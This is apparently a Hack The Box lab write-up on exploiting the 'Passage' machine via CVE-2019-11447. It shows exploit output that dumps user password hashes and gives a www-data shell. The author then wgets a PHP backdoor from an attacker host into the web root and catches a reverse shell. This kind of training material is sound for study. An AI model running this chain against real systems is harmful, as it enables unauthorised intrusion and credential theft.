InfoSec LAB

Passage_Exploitation

Created: 2 min read

CVE-2019-11447

┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ python3 CVE-2019-11447.py 
 
 
 
           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/
 
 
 
 
[->] Usage python3 expoit.py
 
enter the url> http://10.10.10.206/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
================================================================
 
=============================
Registering a users
=============================
[+] registration successful with username: 96fOn2TujQ and password: 96fOn2TujQ
 
=======================================================
Sending Payload
=======================================================
signature_key: e83d674a0c845a119a3f1601ad431900-96fOn2TujQ
signature_dsi: f0e5f171f6e4cf58678ff5ac25d81963
logged in user: 96fOn2TujQ
============================
Dropping to a SHELL
============================
 
command > whoami
www-data
 
command > hostname
passage
 
command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Executing the exploit immediately provides me a shell

Since the shell is a bit funky, I will upgrade it by setting up a backdoor at the web root directory

command > wget http://10.10.14.4/shell.php -O /var/www/html/shell.php

Transferring the backdoor over HTTP

┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ curl -s http://10.10.10.206/shell.php

Triggering

┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 9999            
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 52940
socket: Shell has connected! PID: 3321
whoami
www-data
hostname
passage
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:04:69 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.206/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:469/64 scope global mngtmpaddr dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:469/64 scope link 
       valid_lft forever preferred_lft forever

Initially Foothold established to the target system as the www-data user via exploiting CVE-2019-11447

Interactive Graph View

Backlinks